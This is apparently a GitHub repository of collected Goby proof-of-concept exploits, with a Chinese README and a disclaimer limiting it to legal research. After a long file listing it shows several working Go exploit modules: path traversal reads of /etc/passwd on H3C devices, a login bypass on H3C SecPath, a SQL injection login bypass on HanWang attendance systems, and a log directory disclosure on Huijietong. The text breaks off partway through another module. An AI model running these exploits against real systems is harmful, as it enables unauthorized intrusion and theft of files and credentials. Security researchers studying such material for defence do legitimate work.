├── README.md ├── go ├── ACTI_camera_images_File_read.go ├── AceNet_AceReporter_Report_component_Arbitrary_file_download.go ├── D_Link_Dir_645_getcfg.php_Account_password_disclosure_CVE_2019_17506.go ├── D_Link_ShareCenter_DNS_320_system_mgr.cgi_RCE.go ├── ESAFENET_DLP_dataimport_RCE.go ├── Elasticsearch_Remote_Code_Execution_CVE_2014_3120.go ├── Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go ├── FLIR_AX8_Arbitrary_File_Download_Vulnerability_CNVD-2021-39018.go ├── ForgeRock_AM_RCE_CVE_2021_35464.go ├── H3C_HG659_lib_File_read.go ├── H3C_IMC_dynamiccontent.properties.xhtm_RCE.go ├── H3C_Next_generation_firewall_File_read.go ├── H3C_SecPath_Operation_Login_bypass.go ├── HEJIA_PEMS_SystemLog.cgi_Arbitrary_file_download.go ├── HanWang_Time_Attendance_SQL_injection.go ├── Holographic_AI_network_operation_and_maintenance_platform_RCE.go ├── Huijietong_cloud_video_fileDownload_File_read.go ├── Huijietong_cloud_video_list_Information_leakage.go ├── JEEWMS_Arbitrary_File_Read_Vulnerability.go ├── Jellyfin_Audio_File_read_CVE_2021_21402.go ├── JingHe_OA_download.asp_File_read.go ├── Kingdee_EAS_server_file_Directory_traversal.go ├── LanhaiZuoyue_system_debug.php_RCE.go ├── LanhaiZuoyue_system_download.php_File_read.go ├── Longjing_Technology_BEMS_API_1.21_Remote_Arbitrary_File_Download.go ├── Many_network_devices_have_arbitrary_file_downloads.go ├── Many_network_devices_have_password_leaks.go ├── NVS3000_integrated_video_surveillance_platform_is_not_accessible.go ├── Node_red_UI_base_Arbitrary_File_Read_Vulnerability_CVE_2021_3223.go ├── Panabit_Application_Gateway_ajax_top_backstage_RCE.go ├── Panabit_Panalog_cmdhandle.php_backstage_RCE.go ├── Panabit_iXCache_ajax_cmd_backstage_RCE.go ├── Qilai_OA_CloseMsg.aspx_SQL_injection.go ├── SECWORLD_Next_generation_firewall_pki_file_download_File_read.go ├── SPON_IP_network_intercom_broadcast_system_exportrecord.php_any_file_download.go ├── SPON_IP_network_intercom_broadcast_system_getjson.php_Arbitrary_file_read.go ├── SPON_IP_network_intercom_broadcast_system_ping.php_RCE.go ├── SPON_IP_network_intercom_broadcast_system_rj_get_token.php_any_file_read.go ├── Selea_OCR_ANPR_SeleaCamera_File_read.go ├── Selea_OCR_ANPR_get_file.php_File_read.go ├── Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__ping_RCE.go ├── Shenzhen_West_dieter_Technology_Co_LTD_CPE_WiFi__tracert_RCE.go ├── ShiziyuCms_ApiController.class.php_SQL_injection.go ├── ShiziyuCms_ApigoodsController.class.php_SQL_injection.go ├── ShiziyuCms_wxapp.php_File_update.go ├── ShopXO_download_File_read_CNVD_2021_15822.go ├── TamronOS_IPTV_ping_RCE.go ├── Tongda_OA_api.ali.php_RCE.go ├── TopSec_Reporter_Arbitrary_file_download_CNVD_2021_41972.go ├── Tuchuang_Library_System_Arbitrary_Reading_File_CNVD_2021_34454.go ├── WangKang_NS_ASG_cert_download.php_File_read.go ├── WangKang_Next_generation_firewall_router_RCE.go ├── Weaver_OA_E_Cology_Workflowservicexml_RCE.go ├── Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go ├── ZZZCMS_parserSearch_RCE.go ├── ZhongQing_naibo_Education_Cloud_Platform_Information_leakage.go ├── ZhongQing_naibo_Education_Cloud_platform_reset_password.go ├── ZhongkeWangwei_Next_generation_firewall_File_read.go ├── Zhongxing_F460_web_shell_cmd.gch_RCE.go ├── dahua_DSS_Arbitrary_file_download_cnvd_2020_61986.go ├── nsoft_EWEBS_casmain.xgi_File_read.go ├── showDocGo.go ├── showDocJson.go └── xiaomi_Mi_wiFi_From_File_Read_To_Login_CVE_2019_18370.go └── json ├── 360_TianQing_ccid_SQL_injectable.json ├── 360_Tianqing_database_information_disclosure.json ├── ADSelfService_Plus_RCE_CVE_2021_40539.json ├── Active_UC_index.action_RCE.json ├── Adslr_Enterprise_online_behavior_management_system_Information_leakage.json ├── Alibaba Nacos 控制台默认弱口令.json ├── Alibaba Nacos 未授权访问漏洞.json ├── Alibaba_Nacos_Add_user_not_authorized.json ├── Alibaba_Nacos_Default_password.json ├── Apache ActiveMQ Console控制台弱口令.json ├── Apache Cocoon Xml 注入 CVE-2020-11991.json ├── Apache Kylin Console 控制台弱口令.json ├── Apache Kylin 未授权配置泄露 CVE-2020-13937.json ├── Apache Solr任意文件读取漏洞.json ├── Apache_2.4.49_Path_Traversal_CVE_2021_41773.json ├── Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json ├── Apache_APISIX_Dashboard_CVE_2021_45232.json ├── Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json ├── Apache_ActiveMQ_Console_Weak_Password.json ├── Apache_Airflow_Unauthorized.json ├── Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json ├── Apache_Druid_Arbitrary_File_Read_CVE_2021_36749.json ├── Apache_Druid_Log4shell_CVE_2021_44228.json ├── Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json ├── Apache_HTTP_Server_SSRF_CVE_2021_40438.json ├── Apache_JSPWiki_Log4shell_CVE_2021_44228_1.json ├── Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json ├── Apache_Kylin_Console_Default_password.json ├── Apache_Kylin_Unauthorized_configuration_disclosure.json ├── Apache_OFBiz_Log4shell_CVE_2021_44228.json ├── Apache_SkyWalking_Log4shell_CVE_2021_44228.json ├── Apache_Solr_Arbitrary_File_Read.json ├── Apache_Solr_RemoteStreaming_File_Read.json ├── Aspcms_Backend_Leak.json ├── Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json ├── Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json ├── Atlassian_Jira_user_information_disclosure.json ├── CVE_2018_19367_.json ├── Cacti_Weathermap_File_Write.json ├── China_Mobile_Yu_Routing_Sensitive_Information_Leaks_Vulnerability.json ├── China_Mobile_Yu_routed_the_login_bypass.json ├── Citrix_Unauthorized_CVE_2020_8193.json ├── ClickHouse_SQLI.json ├── ClusterEngineV4.0_RCE_.json ├── ClusterEngine_V4.0_Shell_cluster_RCE.json ├── Coldfusion_LFI_CVE_2010_2861.json ├── Confluence_RCE_CVE_2021_26084.json ├── Consul_Rexec_RCE.json ├── Coremail_configuration_information_disclosure.json ├── Couch_CMS_Infoleak_CVE_2018_7662.json ├── Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json ├── Couchdb_Unauth.json ├── CraftCMS_Seomatic_RCE_CVE_2020_9597.json ├── D-Link AC集中管理系统默认弱口令.json ├── D-Link DCS系列监控 CNVD-2020-25078.json ├── D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078.json ├── D_Link_AC_Centralized_management_system__Default_weak_password.json ├── D_Link_DC_Disclosure_of_account_password_information.json ├── D_Link_DIR_868L_getcfg.php_Account_password_leakage.json ├── D_Link_ShareCenter_DNS_320_RCE.json ├── Datang_AC_Default_Password.json ├── DedeCMS_Carbuyaction_FileInclude.json ├── DedeCMS_InfoLeak_CVE_2018_6910.json ├── Discuz_ML_3.x_RCE__CNVD_2019_22239.json ├── Discuz_RCE_WOOYUN_2010_080723.json ├── Discuz_Wechat_Plugins_Unauth.json ├── Discuz_v72_SQLI.json ├── Dlink_850L_Info_Leak.json ├── Dlink_Info_Leak_CVE_2019_17506.json ├── Dlink_RCE_CVE_2019_16920.json ├── Docker_Registry_API_Unauth.json ├── Dubbo_Admin_Default_Password.json ├── Eyou_Mail_system_RCE.json ├── F5_BIG_IP_RCE_CVE_2021_22986_exp.json ├── Fastmeeting_Arbitrary_File_Read.json ├── FineReport_Directory_traversal.json ├── FineReport_v8.0_Arbitrary_file_read_.json ├── FineReport_v9_Arbitrary_File_Overwrite.json ├── Finetree_5MP_default_password_or_Unauthorized_user_added.json ├── GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413.json ├── GitLab_Graphql_Email_information_disclosure.json ├── GitLab_SSRF_CVE_2021_22214.json ├── Gitlab_RCE_CVE_2021_22205.json ├── Grafana_Arbitrary_file_read.json ├── Grafana_Plugins_Arbitrary_File_Read.json ├── H3C_IMC_RCE.json ├── H5S_video_platform_GetSrc_information_leakage.json ├── H5S_video_platform_GetUserInfo_Account_password_leakage.json ├── HIKVISION 视频编码设备接入网关 任意文件下载.json ├── HIKVISION_Video_coding_equipment_Download_any_file.json ├── Hikvision_RCE_CVE_2021_36260.json ├── Hsmedia_Hgateway_Default_account.json ├── IFW8_Enterprise_router_Password_leakage_.json ├── IRDM4000_Smart_station_Unauthorized_access.json ├── IceWarp_WebClient_basic_RCE.json ├── JQuery_1.7.2Version_site_foreground_arbitrary_file_download.json ├── Jellyfin_10.7.0_Unauthenticated_Abritrary_File_Read_CVE_2021_21402.json ├── Jellyfin_SSRF_CVE_2021_29490.json ├── JingHe_OA_C6_Default_password.json ├── Jinher_OA_C6_download.jsp_Arbitrary_file_read.json ├── Jinshan_V8.json ├── Jitong_EWEBS_arbitrary_file_read.json ├── Jitong_EWEBS_phpinfo_leak.json ├── KEDACOM_MTS_transcoding_server_Arbitrary_file_download_CNVD_2020_48650.json ├── Kingsoft_V8_Arbitrary_file_read.json ├── Kingsoft_V8_Default_weak_password.json ├── Konga_Default_JWT_KEY.json ├── Kyan.json ├── Kyan_Account_password_leak.json ├── Kyan_design_account_password_disclosure.json ├── Kyan_run.php_RCE.json ├── Lanproxy 目录遍历漏洞 CVE-2021-3019.json ├── Lanproxy_Arbitrary_File_Read_CVE_2021_3019.json ├── Lanproxy_Directory_traversal_CVE_2021_3019.json ├── Laravel .env 配置文件泄露 CVE-2017-16894.json ├── Laravel_.env_configuration_file_leaks_(CVE-2017-16894).json ├── Leadsec_ACM_information_leakage_CNVD_2016_08574.json ├── MPSec_ISG1000_Security_Gateway_Arbitrary_File_Download_Vulnerability.json ├── MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.json ├── MessageSolution_EEA_information_disclosure.json ├── Metabase_Geojson_Arbitrary_File_Read_CVE_2021_41277.json ├── Metabase_geojson_Arbitrary_file_reading_CVE_2021_41277.json ├── Micro_module_monitoring_system_User_list.php_information_leakage.json ├── Microsoft Exchange SSRF漏洞 CVE-2021-26885.json ├── MobileIron_Log4shell_CVE_2021_44228.json ├── Node_RED_ui_base_Arbitrary_File_Read.json ├── OpenSNS_RCE.json ├── RG_UAC.json ├── Ruijie_smartweb_password_information_disclosure.json ├── Ruijie_smartweb_weak_password.json ├── RuoYi_Druid_Unauthorized_access.json ├── SDWAN_smart_gateway_weak_password.json ├── Samsung_WLAN_AP_RCE.json ├── Samsung_WLAN_AP_WEA453e_RCE.json ├── Samsung_WLAN_AP_wea453e_router_RCE.json ├── Security_Devices_Hardcoded_Password.json ├── Seeyon_OA_A6_DownExcelBeanServlet_User_information_leakage.json ├── Seeyon_OA_A6__Disclosure_of_database_sensitive_information.json ├── Seeyon_OA_A6_initDataAssess.jsp_User_information_leakage.json ├── Seeyon_OA_A6_setextno.jsp_SQL_injection.json ├── Seeyon_OA_A6_test.jsp_SQL_injection.json ├── Seeyon_OA_A8_m_Information_leakage.json ├── ShopXO_download_Arbitrary_file_read_CNVD_2021_15822.json ├── SonarQube_unauth_CVE_2020_27986.json ├── SonicWall SSL-VPN 远程命令执行漏洞.json ├── SonicWall_SSL_VPN_RCE.json ├── Struts2_Log4Shell_CVE_2021_44228_1.json ├── Struts2_Log4Shell_CVE_2021_44228_2.json ├── Struts2_Log4Shell_CVE_2021_44228_3.json ├── TamronOS_IPTV_Arbitrary_file_download.json ├── TamronOS_IPTV_RCE.json ├── Tianwen_ERP_system__uploadfile.aspx_Arbitraryvfilevupload.json ├── U8_OA.json ├── UniFi_Network_Log4shell_CVE_2021_44228.json ├── VENGD_Arbitrary_File_Upload.json ├── VMWare_Horizon_Log4shell_CVE_2021_44228.json ├── VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json ├── VMware_NSX_Log4shell_CVE_2021_44228.json ├── VMware_vCenter_Log4shell_CVE_2021_44228_1.json ├── VMware_vCenter_v7.0.2_Arbitrary_File_Read.json ├── Wayos AC集中管理系统默认弱口令 CNVD-2021-00876.json ├── Wayos_AC_Centralized_management_system_Default_weak_password.json ├── Weaver_EOffice_Arbitrary_File_Upload_CNVD_2021_49104.json ├── Weaver_OA_8_SQL_injection.json ├── Weaver_e_office_UploadFile.php_file_upload_CNVD_2021_49104.json ├── Weblogic LDAP Internet RCE CVE-2021-2109.json ├── Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109.json ├── Weblogic SSRF漏洞 CVE-2014-4210.json ├── Weblogic_LDAP_RCE_CVE_2021_2109.json ├── Weblogic_SSRF.json ├── XXL-JOB 任务调度中心 后台默认弱口令.json ├── XXL_JOB_Default_password.json ├── Xieda_oa.json ├── YAPI_RCE.json ├── Yinpeng_Hanming_Video_Conferencing__Arbitrary_file_read.json ├── Yonyou_UFIDA_NC_bsh.servlet.BshServlet_rce.json ├── ZhongXinJingDun_Default_administrator_password.json ├── alibaba_canal_default_password.json ├── chanjet_CRM_get_usedspace.php_sql_injection.json ├── dahua_DSS_Arbitrary_file_download.json ├── fahuo100_sql_injection_CNVD_2021_30193.json ├── firewall_Leaked_user_name_and_password.json ├── landray_OA_Arbitrary_file_read.json ├── mallgard.json ├── php8.1backdoor.json ├── sangfor_Behavior_perception_system_c.php_RCE.json ├── shtermQiZhi_Fortress_Arbitrary_User_Login.json ├── tongdaoa_unauth.json ├── yongyou_NC_bsh.servlet.BshServlet_RCE.json ├── yycms_XSS.json ├── 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757.json ├── 来福云SQL注入漏洞.json ├── 致远OA A6 数据库敏感信息泄露.json ├── 致远OA A6 用户敏感信息泄露.json ├── 致远OA webmail.do任意文件下载 CNVD-2020-62422.json ├── 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.json └── 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞.json /README.md: -------------------------------------------------------------------------------- 1 | # Goby_POC 2 | 在互联网中搜集的262个goby poc 3 | 4 | 5 | 6 | 7 | ## 部分poc来自以下项目 8 | - [https://github.com/aetkrad/goby_poc](https://github.com/aetkrad/goby_poc) 9 | - [https://github.com/H4K6/Goby-POC](https://github.com/H4K6/Goby-POC) 10 | - [https://github.com/XingHuoLiaoYuanBaby/goby_poc](https://github.com/XingHuoLiaoYuanBaby/goby_poc) 11 | 12 | # 仅限用于合法和学习研究用途!仅限用于合法和学习研究用途!仅限用于合法和学习研究用途! 13 | -------------------------------------------------------------------------------- /go/H3C_HG659_lib_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "H3C HG659 lib File Read", 16 | "Description": "H3C HG659 is any file read, can read any file server", 17 | "Product": "H3C HG659", 18 | "Homepage": "https://www.huawei.com/", 19 | "DisclosureDate": "2021-06-15", 20 | "Author": "PeiQi", 21 | "GobyQuery": "app=\"HuaWei-Home-Gateway\"", 22 | "Level": "2", 23 | "Impact": "

File read

", 24 | "Recommendation": "Update", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "File", 32 | "type": "input", 33 | "value": "/etc/passwd" 34 | } 35 | ], 36 | "ScanSteps": [ 37 | "AND" 38 | ], 39 | "ExploitSteps": null, 40 | "Tags": [ 41 | "File read" 42 | ], 43 | "CVEIDs": null, 44 | "CVSSScore": "0.0", 45 | "AttackSurfaces": { 46 | "Application": [ 47 | "H3C HG659" 48 | ], 49 | "Support": null, 50 | "Service": null, 51 | "System": null, 52 | "Hardware": null 53 | }, 54 | "Recommandation": "

undefined

" 55 | }` 56 | 57 | ExpManager.AddExploit(NewExploit( 58 | goutils.GetFileName(), 59 | expJson, 60 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 61 | uri := "/lib///....//....//....//....//....//....//....//....//etc//passwd" 62 | cfg := httpclient.NewGetRequestConfig(uri) 63 | cfg.VerifyTls = false 64 | cfg.FollowRedirect = false 65 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 66 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 67 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root:") 68 | } 69 | return false 70 | }, 71 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 72 | file := ss.Params["File"].(string) 73 | file = strings.Replace(file, "/", "//", -1) 74 | uri := "/lib///....//....//....//....//....//....//....//...." + file 75 | cfg := httpclient.NewGetRequestConfig(uri) 76 | cfg.VerifyTls = false 77 | cfg.FollowRedirect = false 78 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 79 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 80 | if resp.StatusCode == 200 { 81 | expResult.Output = resp.RawBody 82 | expResult.Success = true 83 | } 84 | } 85 | return expResult 86 | }, 87 | )) 88 | } 89 | -------------------------------------------------------------------------------- /go/H3C_Next_generation_firewall_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "H3C Next generation firewall File read", 15 | "Description": "Attackers can download arbitrary files on the server through the vulnerability", 16 | "Product": "H3C Next generation firewall", 17 | "Homepage": "http://www.h3c.com.cn", 18 | "DisclosureDate": "2021-05-28", 19 | "Author": "PeiQi", 20 | "GobyQuery": "app=\"H3C-Firewall\"", 21 | "Level": "2", 22 | "Impact": "

File read

", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": true, 28 | "ExpParams": [ 29 | { 30 | "name": "File", 31 | "type": "input", 32 | "value": "/etc/passwd" 33 | } 34 | ], 35 | "ExpTips": { 36 | "Type": "", 37 | "Content": "" 38 | }, 39 | "ScanSteps": [ 40 | "AND" 41 | ], 42 | "ExploitSteps": null, 43 | "Tags": [ 44 | "File read" 45 | ], 46 | "CVEIDs": null, 47 | "CVSSScore": "0.0", 48 | "AttackSurfaces": { 49 | "Application": [ 50 | "H3C Next generation firewall" 51 | ], 52 | "Support": null, 53 | "Service": null, 54 | "System": null, 55 | "Hardware": null 56 | }, 57 | "Recommandation": "

undefined

" 58 | }` 59 | 60 | ExpManager.AddExploit(NewExploit( 61 | goutils.GetFileName(), 62 | expJson, 63 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 64 | uri := "/webui/?g=sys_dia_data_down&file_name=../../../../../etc/passwd" 65 | cfg := httpclient.NewGetRequestConfig(uri) 66 | cfg.VerifyTls = false 67 | cfg.FollowRedirect = false 68 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 69 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 70 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root") 71 | } 72 | return false 73 | }, 74 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 75 | file := ss.Params["File"].(string) 76 | uri := "/webui/?g=sys_dia_data_down&file_name=../../../../.." + file 77 | cfg := httpclient.NewGetRequestConfig(uri) 78 | cfg.VerifyTls = false 79 | cfg.FollowRedirect = false 80 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 81 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 82 | expResult.Output = resp.RawBody 83 | expResult.Success = true 84 | } 85 | return expResult 86 | }, 87 | )) 88 | } -------------------------------------------------------------------------------- /go/H3C_SecPath_Operation_Login_bypass.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "H3C SecPath Operation Login bypass", 15 | "Description": "H3C SecPath Operation Login bypass", 16 | "Product": "H3C SecPath", 17 | "Homepage": "https://www.h3c.com.cn", 18 | "DisclosureDate": "2021-05-18", 19 | "Author": "PeiQi", 20 | "GobyQuery": "app=\"H3C-SecPath-Operation-and-maintenance-audit-system\"", 21 | "Level": "1", 22 | "Impact": "Login bypass", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": null, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "data": "", 34 | "data_type": "text", 35 | "follow_redirect": true, 36 | "method": "GET", 37 | "uri": "/" 38 | }, 39 | "ResponseTest": { 40 | "checks": [ 41 | { 42 | "bz": "", 43 | "operation": "==", 44 | "type": "item", 45 | "value": "200", 46 | "variable": "$code" 47 | } 48 | ], 49 | "operation": "AND", 50 | "type": "group" 51 | } 52 | } 53 | ], 54 | "ExploitSteps": null, 55 | "Tags": ["RCE"], 56 | "CVEIDs": null, 57 | "CVSSScore": "0.0", 58 | "AttackSurfaces": { 59 | "Application": ["H3C IMC"], 60 | "Support": null, 61 | "Service": null, 62 | "System": null, 63 | "Hardware": null 64 | } 65 | }` 66 | 67 | ExpManager.AddExploit(NewExploit( 68 | goutils.GetFileName(), 69 | expJson, 70 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 71 | uri := "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" 72 | cfg := httpclient.NewGetRequestConfig(uri) 73 | cfg.VerifyTls = false 74 | cfg.FollowRedirect = false 75 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 76 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 77 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "审计管理员") 78 | } 79 | return false 80 | }, 81 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 82 | return expResult 83 | }, 84 | )) 85 | } -------------------------------------------------------------------------------- /go/HanWang_Time_Attendance_SQL_injection.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "HanWang Time Attendance SQL injection", 15 | "Description": "HanWang Time Attendance SQL injection", 16 | "Product": "HanWang Time Attendance", 17 | "Homepage": "https://www.hw99.com/", 18 | "DisclosureDate": "2021-05-19", 19 | "Author": "PeiQi", 20 | "GobyQuery": "title=\"汉王人脸考勤管理系统\"", 21 | "Level": "2", 22 | "Impact": "SQL injection", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": null, 29 | "ExpTips": { 30 | "Type": "", 31 | "Content": "" 32 | }, 33 | "ScanSteps": [ 34 | "AND", 35 | { 36 | "Request": { 37 | "data": "", 38 | "data_type": "text", 39 | "follow_redirect": true, 40 | "method": "GET", 41 | "uri": "/" 42 | }, 43 | "ResponseTest": { 44 | "checks": [ 45 | { 46 | "bz": "", 47 | "operation": "==", 48 | "type": "item", 49 | "value": "200", 50 | "variable": "$code" 51 | } 52 | ], 53 | "operation": "AND", 54 | "type": "group" 55 | } 56 | } 57 | ], 58 | "ExploitSteps": null, 59 | "Tags": ["SQL injection"], 60 | "CVEIDs": null, 61 | "CVSSScore": "0.0", 62 | "AttackSurfaces": { 63 | "Application": ["HanWang Time Attendance"], 64 | "Support": null, 65 | "Service": null, 66 | "System": null, 67 | "Hardware": null 68 | } 69 | }` 70 | 71 | ExpManager.AddExploit(NewExploit( 72 | goutils.GetFileName(), 73 | expJson, 74 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 75 | uri := "/Login/Check" 76 | cfg := httpclient.NewPostRequestConfig(uri) 77 | cfg.VerifyTls = false 78 | cfg.FollowRedirect = false 79 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 80 | cfg.Data = "strName=admin' or 1=1--&strPwd=admin" 81 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 82 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "ok") 83 | } 84 | return false 85 | }, 86 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 87 | return expResult 88 | }, 89 | )) 90 | } -------------------------------------------------------------------------------- /go/Huijietong_cloud_video_list_Information_leakage.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "Huijietong cloud video list Information leakage", 15 | "Description": "Huijietong cloud video list Information leakage", 16 | "Product": "Huijietong cloud video", 17 | "Homepage": "http://www.hjtcloud.com/", 18 | "DisclosureDate": "2021-05-17", 19 | "Author": "PeiQi", 20 | "GobyQuery": "body=\"/him/api/rest/v1.0/node/role\"", 21 | "Level": "1", 22 | "Impact": "Server Information leakage", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": [ 29 | { 30 | "name": "", 31 | "type": "", 32 | "value": "" 33 | } 34 | ], 35 | "ExpTips": { 36 | "Type": "", 37 | "Content": "" 38 | }, 39 | "ScanSteps": [ 40 | "AND", 41 | { 42 | "Request": { 43 | "data": "", 44 | "data_type": "text", 45 | "follow_redirect": true, 46 | "method": "GET", 47 | "uri": "/" 48 | }, 49 | "ResponseTest": { 50 | "checks": [ 51 | { 52 | "bz": "", 53 | "operation": "==", 54 | "type": "item", 55 | "value": "200", 56 | "variable": "$code" 57 | } 58 | ], 59 | "operation": "AND", 60 | "type": "group" 61 | } 62 | } 63 | ], 64 | "ExploitSteps": null, 65 | "Tags": ["Information leakage"], 66 | "CVEIDs": null, 67 | "CVSSScore": "0.0", 68 | "AttackSurfaces": { 69 | "Application": ["Huijietong cloud video"], 70 | "Support": null, 71 | "Service": null, 72 | "System": null, 73 | "Hardware": null 74 | } 75 | }` 76 | 77 | ExpManager.AddExploit(NewExploit( 78 | goutils.GetFileName(), 79 | expJson, 80 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 81 | uri := "/him/api/rest/V1.0/system/log/list?filePath=../" 82 | cfg := httpclient.NewGetRequestConfig(uri) 83 | cfg.VerifyTls = false 84 | cfg.FollowRedirect = false 85 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 86 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 87 | return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "absolutePath") 88 | } 89 | return false 90 | }, 91 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 92 | return expResult 93 | }, 94 | )) 95 | } 96 | -------------------------------------------------------------------------------- /go/JingHe_OA_download.asp_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | "net/url" 12 | ) 13 | 14 | func init() { 15 | expJson := `{ 16 | "Name": "JingHe OA download.asp File read", 17 | "Description": "There is an arbitrary file reading vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server", 18 | "Product": "JingHe OA", 19 | "Homepage": "http://www.jinher.com/", 20 | "DisclosureDate": "2021-06-09", 21 | "Author": "PeiQi", 22 | "GobyQuery": "app=\"Jinher-OA\"", 23 | "Level": "2", 24 | "Impact": "

JingHe OA

